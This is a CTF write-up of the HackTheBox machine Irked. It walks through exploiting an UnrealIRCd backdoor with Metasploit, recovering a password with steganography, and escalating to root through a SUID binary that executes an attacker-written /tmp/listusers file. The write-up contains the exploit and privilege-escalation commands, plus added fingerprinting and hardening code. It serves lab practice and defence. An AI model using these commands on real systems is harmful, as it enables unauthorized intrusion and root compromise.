Hey nullers. This is my write-up about Irked, a retired machine from HackTheBox, an awesome place to practice your skills on infosec.
This is my first ever writeup so feedback is more than welcome
I started with what I think 90% of everyone out there starts with: an nmap scan.
Visiting the website at http://10.10.10.117/ we get this content
From the beginning we get the first clue: IRC. But my first scan wasn’t satisfying, so I looked a little deeper with
nmap -p- 10.10.10.117
So there is an open irc port. The website was telling us that the irc was not working correctly, so if we connect to it, we might find something that we can take advantage of.
There I spent some time researching what a MOTD file is, but it didn’t help me. So the next step for me was to search for an IRC exploit on Metasploit (skid detected) in a desperate hope for an exploit.
After seeing the results and spending a minute or so, my brain finally started to kick in: the specific IRC version (Unreal3.2.8.1) was vulnerable to backdoor command execution.
After setting the RHOST and RPORT with
set RHOST 10.10.10.117
set RPORT 6697
I ran the exploit.
Hacker’s voice: I’m in.
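Added example, not code from the original write-up or from Metasploit: before firing an exploit module it is worth confirming the daemon version yourself, because the IRC server announces it in its greeting (the RPL_YOURHOST reply, numeric 002). The sample greeting lines below are constructed, the hostname irked.htb is made up, and the backdoored version string is an assumption taken from the name of the Metasploit unreal_ircd_3281_backdoor module. fingerprint() does real network I/O against the host you pass it.

```python
# Added example, not from the original write-up: read the IRC server's
# version from its 002 greeting so the exploit choice rests on evidence.
import re
import socket

# Assumption: the release the Metasploit unreal_ircd_3281_backdoor module
# is named after. Extend the set if you track other backdoored builds.
BACKDOORED_VERSIONS = {"Unreal3.2.8.1"}

# Wire format of RPL_YOURHOST (RFC 2812 numeric 002):
# ":<server> 002 <nick> :Your host is <server>, running version <version>"
_YOURHOST_RE = re.compile(
    r"^:\S+ 002 \S+ :Your host is \S+, running version (\S+)$"
)

# Constructed sample greeting (hostname and nick are made up for the demo).
SAMPLE_GREETING = [
    ":irked.htb 001 probe :Welcome to the IRC network probe",
    ":irked.htb 002 probe :Your host is irked.htb, running version Unreal3.2.8.1",
    ":irked.htb 003 probe :This server was created some time ago",
]


def parse_server_version(lines):
    """Return the version string from the first 002 reply in lines, or None."""
    for line in lines:
        m = _YOURHOST_RE.match(line.strip())
        if m:
            return m.group(1)
    return None


def is_backdoored(version):
    """True if the announced version is a known backdoored build."""
    return version in BACKDOORED_VERSIONS


def fingerprint(host, port=6697, timeout=5.0):
    """Register with the server and return (version, backdoored).

    Performs network I/O. Answers any PING so the server completes
    registration and sends its 001-004 greeting; returns as soon as the
    002 line is seen.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b"NICK probe\r\nUSER probe 0 * :probe\r\n")
        buf = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
            while b"\r\n" in buf:
                raw, buf = buf.split(b"\r\n", 1)
                line = raw.decode("utf-8", "replace")
                if line.startswith("PING"):
                    sock.sendall(("PONG" + line[4:] + "\r\n").encode())
                elif " 002 " in line:
                    version = parse_server_version([line])
                    sock.sendall(b"QUIT\r\n")
                    return version, is_backdoored(version)
    return None, False


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(fingerprint(sys.argv[1]))
    else:
        v = parse_server_version(SAMPLE_GREETING)
        print(v, is_backdoored(v))
```

If the server only speaks TLS on the port you probe, wrap the socket with ssl.create_default_context() (with verification relaxed for a lab box) before sending the NICK/USER lines; the parsing is the same.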
After navigating through the system I found a user named “djmardov”. In his Documents directory there were 2 files: user.txt and .backup. Being only able to read the backup file, I came across this result:
What I understood is that steg stands for steganography, i.e. the way of hiding data within other files. But there must exist an image for this, because most steg challenges that I’ve encountered hide data inside image files. And there was only one image available in the whole machine:
For steg challenges that require extracting information from an image with a password, I either use steghide
steghide --extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
or I often visit this site. This time, to show something different than the classic steghide, I entered this image with the password on the website and I got djmardov’s password.
I logged in via ssh and user.txt was patiently waiting for me there.
djmardov@irked:~/Documents$ cat user.txt
4a*********
Now on to root!
My privilege escalation skills are not that great, so for a start I use some standard commands from the 0x00sec forum. After running
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
I came across some binaries that are executed as root.
It took me quite some time to figure this out. An experienced hacker would easily recognize the binaries that stand out in a normal Linux machine.
After testing some binaries I came across /usr/bin/viewuser. After putting it to the test I got this error.
So this particular binary was looking for the /tmp/listusers file and executing whatever command the file contained. So the solution is to create the /tmp/listusers file and write in it a command that the binary will execute as root.
After giving the file execute permission with
chmod +x /tmp/listusers
I executed the binary and there’s our flag:
djmardov@irked:~$ echo "cat /root/root.txt" > /tmp/listusers
djmardov@irked:~$ chmod +x /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2018-11-17 13:54 (:0)
djmardov pts/1 2018-11-17 14:19 (10.10.14.23)
8d8e9*************************
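The viewuser bug is an instance of a general pattern: a privileged program executes a fixed path that lives under a world-writable directory, so anyone can create that file first. Added example, not the box's binary and not the write-up's code: the ownership and permission check a hardened helper would apply before executing /tmp/listusers, shown next to the unchecked call the vulnerable binary effectively makes. The mode values in the comments are constructed for illustration; run_helper_vulnerable() and run_helper_hardened() execute whatever is at HELPER, so only call them against a file you created yourself.

```python
# Added example, not from the original write-up: why a root-privileged
# helper that runs /tmp/listusers is exploitable, and the check that would
# have refused the attacker-created file.
import os
import stat

HELPER = "/tmp/listusers"  # the path the write-up's viewuser binary executes


def helper_is_trustworthy(st_uid, st_mode, dir_uid, dir_mode):
    """Decide, from stat() results, whether root may execute the helper.

    Requirements (none of which the vulnerable binary checked):
      * the helper is a regular file (symlinks are rejected), owned by root,
        and not writable by group or others;
      * its directory is owned by root and not writable by group or others.
        The sticky bit on /tmp does not help: a sticky, world-writable
        directory still lets any user create a file that does not exist yet,
        which is exactly what the write-up does.
    """
    if not stat.S_ISREG(st_mode):
        return False
    if st_uid != 0 or st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    if not stat.S_ISDIR(dir_mode):
        return False
    if dir_uid != 0 or dir_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    return True


def check_helper(path=HELPER):
    """Stat the helper and its directory and apply helper_is_trustworthy."""
    try:
        st = os.lstat(path)  # lstat so a symlink planted in /tmp is rejected
    except FileNotFoundError:
        return False
    d = os.stat(os.path.dirname(path) or ".")
    return helper_is_trustworthy(st.st_uid, st.st_mode, d.st_uid, d.st_mode)


def run_helper_vulnerable():
    """What viewuser effectively does: run the file with no checks at all."""
    return os.system(HELPER)


def run_helper_hardened():
    """Refuse to run the helper unless it and its directory are root-controlled."""
    if not check_helper():
        raise PermissionError("refusing to execute untrusted " + HELPER)
    return os.system(HELPER)


if __name__ == "__main__":
    # Example modes (constructed): /tmp is 0o41777, a user's file is 0o100755.
    print("attacker file in /tmp:", helper_is_trustworthy(1000, 0o100755, 0, 0o41777))
    print("root file in root dir:", helper_is_trustworthy(0, 0o100755, 0, 0o40755))
    print("current", HELPER, "trusted:", check_helper())
```

Even with the check, stat-then-exec leaves a window for a race; the real fix is to never take the helper from a directory other users can write to, and to keep it in a root-owned location such as /usr/lib/<program>/.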
I think Irked was an easy box. Nevertheless, it taught me to be patient and to read everything line by line.